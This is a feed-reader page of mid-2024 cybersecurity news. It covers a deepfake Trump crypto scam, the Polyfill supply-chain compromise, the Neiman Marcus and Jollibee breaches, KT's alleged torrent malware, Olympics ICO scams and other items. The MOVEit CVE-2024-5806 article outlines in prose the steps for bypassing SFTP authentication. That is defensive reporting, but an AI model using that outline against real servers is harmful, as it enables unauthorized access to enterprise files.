Reading view

There are new articles available, click to refresh the page.

Scammers Promoted Fake Donald Trump Live Stream Urging Cryptocurrency Donations During Presidential Debate

✇Cybersecurity News and Magazine
Alan J

Fake Trump Cryptocurrency Promotion Scam Presidential Debate

A convincing live stream featuring a seemingly-legitimate Donald Trump YouTube channel quickly gained massive traction before the U.S. Presidential debate Thursday, reaching nearly half the number of subscribers as the official Donald Trump YouTube channel before it was taken down. The channel and Trump deepfake urged viewers to donate in cryptocurrency, with promises of substantial rewards in exchange. The video was titled with keywords related to the official Presidential debate between Trump and Biden while sharing a fake promotional website and QR code for donations through Bitcoin, Ethereum, Doge and Tether cryptocurrencies.

Fake Trump Cryptocurrency Promotion Scam Streamed Ahead of Presidential Debate

The timing of the fake live stream coincided with the scheduled debate this week between current U.S. President Joe Biden and former President and challenger Donald J. Trump. Scammers behind the campaign appeared to be taking advantage of actual statements made by Trump supporting cryptocurrency in the past, coupled with a repeated AI-generated video where he sits alongside popular YouTuber Logan Paul to speak about promoting cryptocurrency within the United States if elected. [caption id="attachment_79454" align="alignnone" width="1351"]Trump Cryptocurrency Scam Presidential Debate Screenshot taken from the livestream.[/caption] The fake video appears to stem from an edit of a podcast video where Trump joined the YouTuber to speak on various issues, including the election, U.S. politics, his personal life and his opponent. The edited fake video shared a QR code and website (donaldtrump[.]gives) where viewers could be tricked into making donations. The website incorporates official Trump campaign branding for the 2024 presidential election, sharing instructions for participation in the "unique event," a multiplier to lure visitors with calculations on how much cryptocurrency they would receive in return for their donation, and a "live" feed of ongoing donations made to the shared cryptocurrency addresses. [caption id="attachment_79477" align="alignnone" width="690"]Fake Trump Cryptocurrency Promotion Scam Presidential Debate 2024 Cryptocurrency addresses involved with the scam[/caption] "During this unique event, you have the opportunity to take a share of 2,000 BTC & 50,000 ETH & 500,000,000 DOGE & 50,000,000 USDT. Have a look at the rules and don't miss out on this. You can only participate once!" the scam website stated. According to details from a WhoIs lookup, the website appears to have been registered on June 27th, the same day as the Presidential debate, using a Russian registrant.

YouTube Channel Connected To Scam Taken Down

The YouTube channel behind this promotion was taken down shortly after a report to YouTube, but the website promoted during the stream still appears to be up and running. The channel was noted to have about 1.38 million subscribers before its takedown, nearly half the subscriber count (2.9 million) for the official Donald J Trump YouTube channel. [caption id="attachment_79462" align="alignnone" width="606"]Trump Cryptocurrency Scam Presidential 3 Debate 2 Email confirmation of Channel takedown[/caption] It is unknown if the live transaction feed featured on the scam website reflects actual real-time transactions. The full extent and the victim count from this cryptocurrency scam is unknown; details of the campaign have been sent to CRIL (Cyble Research and Intelligence Labs) researchers for further investigation. [caption id="attachment_79474" align="alignnone" width="2604"]Fake Trump Cryptocurrency Scam Presidential Debate 44 Screenshot of alleged transactions[/caption] The campaign highlights the threat of Artificial Intelligence content to election-related processes, legitimate campaign donations and impersonation of candidates or well-known figures. In a recent incident, crypto scammers had taken over the YouTube channel of Channel 7 News Australia to use a deepfake Elon Musk to promote dubious crypto investments.

💾

Download the FREE Upside App at https://upside.app.link/impaulsive to get an extra 25 cents back for every gallon on your first tank of gas.Former President ...

Data Security Officer from Philippines Admits to Hacking 93 Different Websites

✇Cybersecurity News and Magazine
Alan J

Philippines National Security

A data security officer from the Manila Bulletin has admitted to hacking 93 websites, including government and private company sites, as well as servers abroad. The hacker, known by the alias "Kangkong," was arrested along with two others by the National Bureau of Investigation (NBI) Cybercrime Division on June 19 following reports of multiple unauthorized access attempts and breaches. Kangkong issued a public apology to President Marcos, the general public, and especially the military community for his actions.

Implications for Philippines National Security

Kangkong's hacking spree exposed significant vulnerabilities in the cybersecurity measures of various organizations. Among the high-profile targets were the peacekeeping operations center website of the Armed Forces of the Philippines, the mail server of the National Security Council, and the Join the PH Army website. The hacker along with two others individuals were arrested by the National Bureau of Investigation (NBI) Cybercrime Division on June 19 after reports of multiple unauthorized access attempts and breaches on websites. [caption id="attachment_79338" align="alignnone" width="1200"]Kangkong Philippines Hack Arrested data officer Kangkong (Source: www.onenews.ph)[/caption] The hacker acknowledged the serious consequences of his actions, including the potential exposure of sensitive data of soldiers to foreign entities. "That's when I realized that we have many enemies and we should not be going against each other," Kangkong stated. The officer revealed in an interview with ABS-CBN that he had left specific pictures on compromised websites as proof of his involvement.

Senior Technology Officer May Be Implicated

In his extrajudicial confession, Kangkong initially implicated Art Samaniego, Manila Bulletin's senior technology officer, as the person who ordered the hacking of several websites. However, he later expressed regret for this claim. Samaniego has denied allegations that he ordered the hacking to boost his social media reach. The NBI Cybercrime Division has issued a subpoena for Samaniego to explain his side to the authorities. Meanwhile, the Manila Bulletin has suspended Samaniego pending an internal investigation. Kangkong also highlighted the inadequate cybersecurity measures in place for government and private companies' websites, stating that this was a key factor in his ability to hack them. He urged organizations to invest in security measures to prevent similar breaches in the future. Kangkong's confession highlights the urgent need for improved cybersecurity measures in the Philippines. He emphasized that inadequate security was a key factor in his ability to breach these websites. "Cybersecurity is not really a priority in the Philippines," he stated, urging organizations to invest in better security measures despite the associated costs.

Recently Disclosed Progress MOVEit Transfer Flaw Observed Being Actively Exploited

✇Cybersecurity News and Magazine
Alan J

Progress MOVEit Vulnerability

A newly disclosed vulnerability in Progress MOVEit Transfer has sparked concern among cybersecurity experts due to the lingering memory of high-profile attacks by ransomware gangs using a different vulnerability last year that hit organizations such as the BBC and FBI. The new authentication bypass flaw, officially designated CVE-2024-5806, could potentially allow unauthorized access to sensitive data. MOVEit Transfer, designed for large-scale enterprise use, boasts features compliant with regulations like PCI and HIPAA. It offers various file transfer methods, including SFTP and HTTPS, making it a critical component in many organizations' data management infrastructure. Progress initially kept details of CVE-2024-5806 under wraps, advising customers to patch systems before its disclosure. On June 25th, 2024, Progress officially un-embargoed the vulnerability, revealing that it affects both MOVEit Transfer version 2023.0 and newer, as well as MOVEit Gateway version 2024.0 and newer.

Progress MOVEit Vulnerability Details

WatchTowr Labs was sent details of the vulnerability by a user who identified as 'dav1d_bl41ne' on its IRC channel, an unusual method of vulnerability sharing, the researchers noted. The researchers decided to investigate further, setting up a test environment to replicate the vulnerability. [caption id="attachment_79318" align="alignnone" width="471"]MOVEit Vulnerability Source: labs.watchtowr.com[/caption] The debugger output from the test environment showed that the server was throwing exceptions and attempting to access files in unexpected ways. Upon further investigation, the researchers discovered that the vulnerability could be exploited by providing a valid file path instead of the SSH public key during authentication. This led to the server attempting to access the file, giving the attacker unauthorized access to the system. The researchers shared the following steps on exploiting the vulnerability:
  • Upload a public key to the File Transfer server.
  • Rather than supplying a legitimate public key, send a file path to the public key, signing the authentication request with the same public key.
  • The key will be accepted by the server with successful login, allowing for the access of target files.
The flaw affects MOVEit Transfer versions 2023.0 and newer, as well as MOVEit Gateway 2024.0 and later. Progress describes it as an "Improper Authentication vulnerability" in the SFTP module that could lead to "Authentication Bypass in limited scenarios." In limited scenarios, CVE-2024-5806 allows for authentication bypass, potentially giving attackers unauthorized access to sensitive files. The vulnerability is particularly concerning because the software is widely used among enterprises, making it a prime target for APT groups, ransomware gangs, and other malicious actors. Progress has shared the following recommendations to prevent exploitation of the flaw:
  • Block public inbound RDP access to MOVEit Transfer server(s).
  • Limit outbound access on MOVEit Transfer server(s) to only trusted endpoints.
According to a post on X from The Shadowserver Foundation, the foundation has already observed active exploitation attempts using the vulnerability soon after its disclosure. [caption id="attachment_79326" align="alignnone" width="1170"]MOVEit Vulnerability Exploitation Source: X.com[/caption]

Implications of the MOVEit Vulnerability

The discovery of this vulnerability soon after major exploitation last year has reignited discussions about the security of file transfer solutions in enterprise environments. The potential for unauthorized access to sensitive files could have far-reaching consequences for the large number of enterprises that rely on MOVEit Transfer. While the full extent of the vulnerability's impact is still being assessed, the incident has sparked more debate about responsible disclosure practices in the cybersecurity community. Some argue that early, private notifications to affected parties are crucial, while others advocate for more transparent, public disclosures to ensure widespread awareness and prompt action. As the situation develops, IT administrators and security professionals are advised to stay vigilant, monitor for any signs of exploitation, and implement recommended security measures to protect their MOVEit Transfer deployments.  

A Step-by-Step Guide to Getting a SOC 2® Report

✇Security Boulevard
Erin Nelson

Ensuring the security of your customers’ and partners’ data is paramount in today’s digital environment. That’s why Service Organization Control 2 (SOC 2®) compliance has emerged as a widely recognized cybersecurity audit framework. SOC 2® reporting has been adopted by more businesses to demonstrate their commitment to strong cybersecurity practices. Let’s explore what a SOC 2® report...

The post A Step-by-Step Guide to Getting a SOC 2® Report appeared first on Hyperproof.

The post A Step-by-Step Guide to Getting a SOC 2® Report appeared first on Security Boulevard.

Scammers Spotted Promoting Fake Olympics Cryptocurrency With AI Generated Imagery

✇Cybersecurity News and Magazine
Alan J

Olympics 2024 ICO Scam

Scammers are exploiting the buzz around the 2024 Paris Olympics to lure victims into investing in initial coin offerings (ICOs). These scams tend to promise big returns on "Olympic" tokens. The campaigns manufacture hype around such offerings through the use of use fake websites, AI-generated images, and social media campaigns to entice investors.

 Olympics Initial Coin Offerings (ICO) Fraud

Researchers from Trend Micro uncovered a recent scheme that claimed to offer an official "Olympics Games Token" for sale. The Olympic Games Token ICO website, theolympictoken[.]com, was registered on March 30, 2024, and its website went live a day later.  The website also links to a legitimate Olympics 2024 logo and a countdown to the event, making it seem like a legitimate project. [caption id="attachment_79264" align="alignnone" width="395"]Olympics Games Token ICO Source: trendmicro.com[/caption] It linked to a "whitepaper" – a document explaining the project's tech and goals. But that link led nowhere useful. Instead of details, it dumped visitors on the official Olympics website. Red flag number one. A Twitter account and Telegram channel pushed followers to buy tokens ASAP. When the original site got shut down, a near-identical one (olympictokensolana[.]com) popped up under a new name. The researchers spotted at least ten other websites using 2024 Olympics-associated branding to lure victims into ICO scams; some of them were shut down shortly after their discovery.

Use of AI-Generated Images Olympics in ICO Scams

[caption id="attachment_79257" align="alignnone" width="1263"]Olympics Crypto ICO Source: trendmicro.com[/caption] The researchers remarked that AI-generated images are becoming increasingly common in such ICO scams, as they offer a cost-effective and time-efficient way to create convincing lures. Cybercriminals can use AI to generate text, correct spelling and grammatical errors, and even create sentences in languages they do not speak. [caption id="attachment_79256" align="alignnone" width="384"]Olympics ICO AI Scam Source: trendmicro.com[/caption] The researchers spotted at least three other ICO Olympics scam websites employing the usage of AI-generated imagery for promotion.

Spotting Fake ICO Campaigns

ICOs have gained significant attention as cryptocurrency continues to be adopted in various industries. While most new tokens lack utility and are simply memecoins, it does not always mean they are scams. Investors should be vigilant and look out for potential scams and rug-pulls. A legitimate ICO should have a proper website and social media presence, a transparent team, an active community, a comprehensive whitepaper, legitimacy of claims, token distribution, smart contract audit, and liquidity management. The researchers have shared the following guidelines to help identify such scams:
  • Proper website and social media presence: The researchers stated that scam sites are often poorly designed or lack active presence on social media.
  • Transparent team: Cross-check the identities and credentials of the teams behind the offering. Anonymity is a red flag.
  • Active community: Genuine projects have engaged followers on platforms like Discord, Twitter or Telegram, which suggests genuine interest and support.
  • Comprehensive whitepaper: A whitepaper that outlines the project's goals, utility, and technical aspects, which demonstrates a thorough understanding of the project's concept and planning.
  • Legitimacy of claims: Claims backed by verifiable evidence, such as partnerships, use cases, and endorsements.
  • Token distribution: Avoid projects with highly concentrated token ownership which might increase the chances of exit scams.
  • Smart contract audit: Audit by reputable third-parties, which identify vulnerabilities.
  • Liquidity management: Liquidity is locked to prevent premature withdrawals and is decentralized among the community, which secures investors' funds.
In the case of the Olympic Games Token, the website raised several red flags such as a very low number of token holders and an invalid whitepaper link. Investors and those interested in cryptocurrency should follow adequate precautions to avoid falling victim to such scams. Experts have been monitoring Olympics-related search engine results and social media activity to counter fraudulent ticketing scams and coordinated disinformation campaigns.

South Korean ISP Accused of Installing Malware on Devices of 600,000 Who Used Torrenting Services

✇Cybersecurity News and Magazine
Alan J

South Korean KT ISP Torrenting

South Korean telecommunications giant KT is under investigation for allegedly hacking the systems of customers who used torrent services such as web hard drives (Webhard), a popular file-sharing service in the country. The scandal, which has been ongoing for nearly five months, has affected an estimated 600,000 customers, with the police investigation revealing that KT may have operated a dedicated malware team.

Malware Infiltrated Systems of Torrenting Subscribers

The incident came to light in May 2020 when numerous web hard drives suddenly stopped working. Users flooded company forums with complaints about unexplained errors. An investigation revealed that malware had infiltrated the "Grid Program," software that enables direct data exchange between users. [caption id="attachment_79121" align="alignnone" width="2800"]KT South Korean ISP Malware Source: mnews.jtbc.co.kr[/caption] The malware, which was designed to interfere with BitTorrent traffic, was allegedly used to monitor and control the internet activities of KT subscribers. The police believe that the motive behind this hacking was to reduce network-related costs, as torrent transfers can be costly for internet service providers. KT, however, claims that it was merely trying to manage traffic on its network to ensure a smooth user experience. KT instead stated that the Webhard services were malicious, however after the the Gyeonggi Southern District Office conducted raids on KT facilities, they believe the ISP may have violated communications and network laws. A police follow-up investigation stated that KT operated a dedicated team responsible for developing, distributing, and operating the malware program. The hacking was traced to  KT's Bundang IDC Center, one of its data centers. Over five months, an estimated 20,000 PCs were infected daily. The malware reportedly created strange folders, made files invisible, and disabled web hard programs.

Legal and Ethical Implications

KT and Webhard companies have a history of conflict, including lawsuits. While a previous court ruled in KT's favor regarding traffic blocking of grid services, the current situation differs significantly. KT was alleged to have planted malicious code on individual users' PCs without consent or explanation. South Korean legal experts question KT's methods, suggesting the company could have pursued formal procedures through its legal team instead of resorting to hacking. The incident raises serious concerns about privacy, corporate responsibility, and the extent to which internet service providers can control network traffic. The scandal has also raised concerns about the security of KT's customers' data, with many wondering what other sensitive information may have been compromised. The company's CEO has since resigned, and the company's reputation has taken a significant hit. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Polyfill Supply Chain Attack Compromises Over 100,000 Websites

✇Cybersecurity News and Magazine
Alan J

Polyfill Injection 34

A widespread supply chain attack has hit more than 100,000 websites, including notable platforms like JSTOR, Intuit, and the World Economic Forum. The attack stems from a fake domain impersonating the popular open-source library Polyfill.js, which supports older browsers. In February, the Chinese company Funnull had acquired the domain and GitHub account associated with the project, leading to the injection of malware into sites that embed cdn.polyfill.io. The malicious code is designed to redirect mobile users to sports betting sites or pornographic sites using a fake Google Analytics domain.

Malicious Polyfill Injection and Its Impact

Researchers stated that the injected malware is dynamically generated based on HTTP headers, making it difficult to detect. The Polyfill injection attack is a classic example of a supply chain attack against a widely used library. [caption id="attachment_79097" align="alignnone" width="2454"]Polyfill Injection At least 104183 websites might be affected. (Source: publicwww.com)[/caption] The compromised Polyfill code dynamically generates malware based on HTTP headers, potentially utilizing multiple attack vectors. Researchers from Sansec decoded one variant that redirects mobile users to a sports betting site using a fake Google Analytics domain. The malware employs sophisticated techniques and defenses against reverse engineering to evade detection, including:
  •  Activating only on specific mobile devices at certain hours
  •  Avoiding execution when an admin user is detected
  •  Delaying activation when web analytics services are present
The attack's scope is significant, with Google already blocking Google Ads for e-commerce sites using polyfill.io. Researchers later reported that their infrastructure had been subjected to DDoS attacks after reporting on the campaign.

Mitigation and Recommendations

Andrew Betts, the original Polyfill author, took to X to advise against the usage of Polyfill altogether, stating that modern browsers no longer require it. He added that he had no influence over the sale of the project and was never in possession of the new domain, and cautioned that websites that serve third-party scripts are a huge security concern. [caption id="attachment_79101" align="alignnone" width="623"] Source: X.com(@triblondon)[/caption] [caption id="attachment_79102" align="alignnone" width="634"] Source: X.com(@triblondon)[/caption] Experts have set up a domain (polykill.io) to warn against the compromise of the project and have recommend the following steps for website owners:
  • Immediately and remove usage of cdn.polyfill.io from websites and projects.
  • Replace with a secure alternative such as those being offered by Fastly and CloudFlare. Fastly has saved and hosted an earlier version(https://polyfill-fastly.io/) of the project's codebase before its sale to Funnull.
The website cautioned of the risks associated with the takeover of the project:
"There are many risks associated with allowing an unknown foreign entity to manage and serve JavaScript within your web application. They can quietly observe user traffic, and if malicious intent were taken, they can potentially steal usernames, passwords and credit card information directly as users enter the information in the web browser."
CloudFlare had also published its findings and recommendations in response to concerns over the compromise of domains. The company stated in a blog article:
The concerns are that any website embedding a link to the original polyfill.io domain, will now be relying on Funnull to maintain and secure the underlying project to avoid the risk of a supply chain attack. Such an attack would occur if the underlying third party is compromised or alters the code being served to end users in nefarious ways, causing, by consequence, all websites using the tool to be compromised."
This incident serves as a stark reminder of the security implications of relying on external code libraries/third-party scripts and the importance of vigilance in maintaining website integrity, plus the potential malicious takeover of massively deployed projects. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Neiman Marcus Alerts Customers After Data Breach Exposes Information of 64,472 Individuals

✇Cybersecurity News and Magazine
Ashish Khaitan

Neiman Marcus data breach

Neiman Marcus has issued a notification to its customers regarding a massive data breach that occurred in May 2024, potentially exposing sensitive personal information. The Neiman Marcus data breach, affecting approximately 64,472 customers, involved unauthorized access to a cloud database platform used by the luxury retailer, which is operated by Snowflake, a third-party provider. In a conversation with The Cyber Express, a Neiman Marcus spokesperson confirmed the breach, stating, "Neiman Marcus Group (NMG) recently learned that an unauthorized party gained access to a cloud database platform used by NMG that is provided by a third party, Snowflake." Prompt action was taken, with the spokesperson adding, "Promptly after discovering the incident, NMG took steps to contain it, including by disabling access to the platform."

Neiman Marcus Data Breach Confirmed

The Neiman Marcus data breach compromised a range of personal data, including customer names, contact details, dates of birth, and Neiman Marcus gift card numbers. "Based on our investigation, the unauthorized party obtained certain personal information stored in the platform," the spokesperson continued, clarifying that "The types of personal information affected varied by individual, and included information such as name, contact information, date of birth, and Neiman Marcus or Bergdorf Goodman gift card numbers (but without gift card PINs)." Neiman Marcus has acted swiftly, launching an investigation with leading cybersecurity experts and notifying law enforcement authorities. In compliance with regulatory requirements, the company has begun notifying affected customers, including reaching out to the Maine Attorney General's office. The retailer has advised customers to monitor their financial statements for any suspicious activity and has provided resources for individuals concerned about identity theft.

Mitigation Against the Neiman Marcus Data Leak

"We also began an investigation with assistance from leading cybersecurity experts and notified law enforcement authorities," the spokesperson emphasized. Customers are encouraged to request free credit reports, report any suspected fraud to law enforcement and the Federal Trade Commission, and consider placing a security freeze on their credit files as precautionary measures. Neiman Marcus Group, Inc., based in Dallas, Texas, is a popular luxury retailer that oversees brands such as Neiman Marcus, Bergdorf Goodman, Horchow, and Last Call. Since September 2021, it has been under the ownership of a consortium of investment firms led by Davidson Kempner Capital Management, Sixth Street Partners, and Pacific Investment Management. Following this Neiman Marcus data leak, the firm has established a dedicated toll-free hotline (1-885-889-2743) for affected customers seeking further information or assistance related to the data breach incident. 

LockBit Claims Ransomware Attack on U.S. Federal Reserve

✇Security Boulevard
Jeffrey Burt
LockBit ransomware Federal Reserve

The LockBit ransomware group is claiming that it hacked into systems at the U.S. Federal Reserve and stole 33TB of data that it will begin leaking as early as Tuesday if the institution doesn’t pay the unspecified ransom. The notorious cybercriminals announced the attack on its dark web leak site on June 23, giving the..

The post LockBit Claims Ransomware Attack on U.S. Federal Reserve appeared first on Security Boulevard.

Google’s Project Naptime Aims for AI-Based Vulnerability Research

✇Security Boulevard
Jeffrey Burt
Google AI LLM vulnerability

Security analysts at Google are developing a framework that they hope will enable large language models (LLMs) to eventually be able to run automated vulnerability research, particularly analyses of malware variants. The analysts with Google’s Project Zero – a group founded a decade ago whose job it is to find zero-day vulnerabilities – have been..

The post Google’s Project Naptime Aims for AI-Based Vulnerability Research appeared first on Security Boulevard.

Airbnb’s Ban on Indoor Security Cameras: What It Means for Your Personal Cybersecurity

✇Security Boulevard
Leigh Dow

Effective April 30, 2024 Airbnb, the global vacation rental giant, announced a significant policy change: the prohibition of all indoor security cameras in its listings worldwide. This decision, aims to bolster the privacy of guests and address longstanding concerns about hidden cameras. While the majority of Airbnb’s over 7 million listings did not report having […]

The post Airbnb’s Ban on Indoor Security Cameras: What It Means for Your Personal Cybersecurity appeared first on BlackCloak | Protect Your Digital Life™.

The post Airbnb’s Ban on Indoor Security Cameras: What It Means for Your Personal Cybersecurity appeared first on Security Boulevard.

Work From Home Security Checklist: Top Cybersecurity Tips for Remote Workers

✇Cybersecurity News and Magazine
Editorial

Remote Workers

When transitioning to remote work, the dynamics drastically change from working within a dedicated office environment tailored to the tasks at hand. Adjusting to this new setting can pose challenges in ensuring responsible handling of sensitive company data. In this article, The Cyber Express (TCE) Team delves into essential cybersecurity measures your company should implement or may already have in place. TCE also emphasizes actions one can take personally, whether they're accessing networks from home or public locations. Both employers and employees share the responsibility of adhering to strong security protocols, especially with the rise of cyber threats. As organizations increasingly prioritize data protection and server security, it's crucial to stay informed about the latest cybersecurity tips for remote work environments. Keep reading to discover key steps to strengthen your cybersecurity posture while working remotely.

Cybersecurity Tips for Remote Workers

Know Your Organization's Cyberwork Policies
Understanding your organization's cyberwork policies ensures remote workers adhere to established protocols, safeguarding sensitive data. These policies typically include guidelines on using secure connections through VPNs, handling confidential information, and using approved applications. By following these protocols, the risk of phishing or malware attacks is reduced as vulnerabilities from unprotected networks and devices are minimized. Awareness of these policies empowers employees to identify and report suspicious activities promptly, facilitating swift responses to potential threats.
Use Only Approved Devices
Using devices approved by your organization is critical for cybersecurity as it ensures compliance with company security standards. Approved devices are equipped with essential security measures such as firewalls, antivirus software, and encryption protocols, effectively reducing vulnerabilities. Regular monitoring and updates ensure these devices remain secure with the latest patches, enhancing protection against unauthorized access and cyber threats. Moreover, using approved devices ensures compatibility with secure networks and systems, maintaining overall cybersecurity integrity.
Implement the Principle of Least Privilege
Implementing access controls based on the principle of least privilege limits access to sensitive information and systems to only those necessary for an employee's role. Strong authentication methods like two-factor authentication (2FA) further verify user identities, enhancing security. Regular review and updates of access permissions are essential, especially in remote work scenarios, to mitigate the risk of unauthorized access and ensure data security.
Secure Home Wi-Fi Networks
Securing your home Wi-Fi network is crucial when working remotely. Use strong, unique passwords and enable WPA3 encryption to protect against unauthorized access. Changing default router login credentials and regularly updating router firmware further enhances security by safeguarding against vulnerabilities and potential breaches. Consider segregating work and personal network usage to further bolster security measures.
Enable Two-Factor Authentication (2FA)
Activating two-factor authentication adds an extra layer of security by requiring a second form of verification alongside passwords. This significantly reduces the risk of unauthorized access, even if passwords are compromised. 2FA methods like SMS codes, authenticator apps, or biometric scans provide robust protection, particularly for handling sensitive work-related data remotely.
Use Strong, Unique Passwords
Protect work-related accounts and devices with strong, unique passwords that include a mix of characters, numbers, and symbols. Avoid using the same password across multiple accounts to mitigate the impact of a potential breach. Consider using a password manager to generate and securely store complex passwords, ensuring optimal security without the risk of forgetting passwords or compromising data integrity.
Use Antivirus and Antimalware Software
Deploy reliable antivirus and antimalware software to detect, block, and remove malicious software threats such as viruses and ransomware. Regular software updates ensure protection against evolving cyber threats, enhancing device and data security. Conducting regular scans helps identify and mitigate potential security risks, preserving the integrity of work devices and sensitive data.
Use a Virtual Private Network (VPN)
Utilize a VPN to encrypt internet connections and enhance security when accessing work-related data remotely. VPNs mask IP addresses and encrypt online activities, safeguarding against unauthorized access and data interception on unsecured Wi-Fi networks. Whether working from home or public locations, VPNs provide a secure channel for transmitting sensitive information, ensuring confidentiality and data integrity.
Keep Software Updated and Data Backed Up
Regularly update operating systems, applications, and security software to protect against vulnerabilities exploited by cybercriminals. Enable automatic updates to ensure devices have the latest security patches and firmware. Back up work data regularly using cloud-based solutions or external hard drives to safeguard against data loss due to hardware failures or cyberattacks. Automating backups ensures data integrity and availability, minimizing disruption and downtime.
Have a Plan of Action for Cyberattacks
Prepare and maintain a comprehensive plan of action for responding to cyberattacks to mitigate damage and facilitate swift recovery. The plan should outline steps for identifying, isolating, and mitigating threats, as well as notifying IT teams for immediate remediation. Regular drills and simulations help familiarize employees with incident response procedures, ensuring a prompt and effective response to cybersecurity incidents when working remotely. By implementing these cybersecurity tips for remote workers, one can enhance data protection, mitigate risks, and contribute to maintaining a secure work environment from any location.

Rafel RAT Used in 120 Campaigns Targeting Android Device Users

✇Security Boulevard
Jeffrey Burt
Android Rafel RAT ransomware

Multiple bad actors are using the Rafel RAT malware in about 120 campaigns aimed at compromising Android devices and launching a broad array of attacks that range from stealing data and deleting files to espionage and ransomware. Rafel RAT is an open-source remote administration tool that is spread through phishing campaigns aimed at convincing targets..

The post Rafel RAT Used in 120 Campaigns Targeting Android Device Users appeared first on Security Boulevard.

Jollibee Probes Alleged Data Breach Affecting 32 Million Customers, Asks Public to Remain Vigilant

✇Cybersecurity News and Magazine
Krishna Murthy

Jollibee Data Breach

Jollibee Foods Corporation (JFC), which is the largest fast-food chain operator in Philippines, has launched an investigation for an alleged data breach in its system that may have affected millions of its customers across the globe. The Jollibee probe was initiated after a threat actor claimed responsibility for breaching the systems of the Jollibee Foods Corporation. On June 21, The Cyber Express reported that a notorious attacker, operating under the alias “Sp1d3r”, claimed to have access to the sensitive data of 32 million customers of the fast food chain and offered to sell the database for $40,000 on the dark web. [caption id="attachment_78479" align="alignnone" width="1950"]Jollibee Cyberattack Source: X[/caption]

Details of Jollibee Probe into Cyberattack

The Philippines National Privacy Commission (NPC) regulations make it mandatory for organizations in the country to report and inform stakeholders of cybersecurity incidents within 72 hours of discovery. A statement was released on June 22 by Richard Shin, Chief Financial Officer and Corporate Information Officer of JFC, which said that it was addressing “a cybersecurity incident” that reportedly affected the company, “in addition to other subsidiaries”. “The Company is addressing the incident and has implemented its response protocols and deployed enhanced security measures to further protect the Company’s and its subsidiaries’ data against threats. The Company has also launched its investigation on the matter to understand the scope of this incident, and is currently working with the relevant authorities and experts in its investigation,” the statement said. JFC, however, added that its e-commerce platforms and those of its subsidiaries’ brands remained unaffected by the cyberattack and continued to be operational. It added that the safety of data from stakeholders was paramount for the company. “JFC recognizes the value and importance of the confidentiality of personal information of its stakeholders. The Company assures the public of its commitment to prioritize the protection and confidentiality of such personal information, including customer data, by continuously fortifying its defenses against future threats,” the company said. “The Company further assures the public that it continues to monitor and update its security measurements as appropriate under the circumstances, and as may be required by the results of its investigation into this matter,” it added. The fast-food delivery group urged the public to be vigilant and exercise good information security practices, including keeping passwords secure and changing them often.

Jollibee’s Cybersecurity Concerns  

The alleged data breach of the fast-food chain took place on popular data hack site BreachForums on June 20. The threat actor, “Sp1d3r”, claimed to have carried out a cyberattack and had gained access to the data of 32 million Jollibee customers, including their names, addresses, phone numbers, email addresses and hashed passwords. The hacker also allegedly exfiltrated 600 million rows of data related to food delivery, sales orders, transactions and service details. JFC, meanwhile, is investigating this alleged cyberattack on its brands and subsidiaries, including Greenwich, Red Ribbon, Burger King Philippines, and Highlands Coffee. This is not the first time that Jollibee has faced flak for its cybersecurity measures. In December 2017, JFC had informed of a data breach of its delivery website. The NPC had then warned that the data of 18 million customers was at “a very high risk” of being exposed. After an investigation, the NPC in May 2018 suspended Jollibee’s delivery website due to “serious vulnerabilities.” JFC also took down the delivery websites of its other brands. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Empowering Women in Cybersecurity: Insights from Irene Corpuz

✇Cybersecurity News and Magazine
Avantika

Empowering Women in Cybersecurity

In a world increasingly dependent on digital infrastructure, the cybersecurity landscape continues to evolve, and so does the role of women in this critical field. Irene Corpuz, a cyber policy expert at the Dubai Electronic Security Center and co-founder and board member of Women in Cyber Security Middle East (WiCSME), shared her insights on effective strategies for encouraging women in cybersecurity and the challenges small businesses face in prioritizing cybersecurity at The World Cybercon META Edition hosted by The Cyber Express in Dubai.

Strategies to Encourage Women in Cybersecurity

Irene Corpuz believes that collaboration and communication are key to empowering women in cybersecurity. One of the most effective strategies is to collaborate and communicate our objectives and advocacy for increasing and empowering women in cyber," she states. By showcasing women in various roles—from mentors and speakers to leaders—on platforms like conferences, the visibility and success of these women can inspire others to pursue their ambitions in the field. "Seeing other women grow and succeed motivates them to pursue their dreams and careers," Irene emphasizes. She highlights the importance of a supportive community, which acts as a backbone for women in cybersecurity, helping them navigate and thrive in the industry.

Trends in Women's Participation in Cybersecurity

Reflecting on her journey, Irene observes a positive trend in the participation of women in cybersecurity. When WiCSME was founded in 2018, women made up only 12% of the cybersecurity workforce. However, this number has significantly increased to 25% by last year. This growth is attributed not just to WiCSME but to the collective efforts of various women-in-cyber organizations worldwide. "There’s a continuous growth, and awareness of the importance of diversity and inclusion in cybersecurity is becoming more widespread," Irene notes. This trend signifies a growing recognition of the value that diverse perspectives bring to the cybersecurity industry.

Challenges for Small Businesses in Cybersecurity

Transitioning the conversation to small businesses, Irene sheds light on the challenges they face in prioritizing cybersecurity. "Small businesses and young entrepreneurs often face constraints in financial resources," she explains. As these businesses focus on growth and expanding their customer base, investing in cybersecurity often becomes a secondary priority. However, Irene stresses the importance of embedding a cybersecurity and awareness culture from the beginning, even if it means taking small steps. "Startups and SMEs need to take baby steps in embedding cybersecurity and awareness culture within their employees," she advises. As these companies mature, their cybersecurity measures should evolve accordingly to build a resilient defense against cyber threats.

Conclusion

The insights shared by Irene Corpuz underscore the significance of community support and visibility in empowering women in cybersecurity. Furthermore, her perspective on the challenges faced by small businesses highlights the necessity of integrating cybersecurity practices gradually and consistently. As the cybersecurity landscape continues to evolve, the contributions of women and the resilience of small businesses will play a pivotal role in shaping a secure digital future.

Social Media Warning Labels, Should You Store Passwords in Your Web Browser?

✇Security Boulevard
Tom Eston

In this episode of the Shared Security Podcast, the team debates the Surgeon General’s recent call for social media warning labels and explores the pros and cons. Scott discusses whether passwords should be stored in web browsers, potentially sparking strong opinions. The hosts also provide an update on Microsoft’s delayed release of CoPilot Plus PCs […]

The post Social Media Warning Labels, Should You Store Passwords in Your Web Browser? appeared first on Shared Security Podcast.

The post Social Media Warning Labels, Should You Store Passwords in Your Web Browser? appeared first on Security Boulevard.

💾

U.S. Bans Sale of Kaspersky Cybersecurity Software

✇Security Boulevard
Michael Vizard
IoT checkmark, consumer, act, compliance, cybersecurity

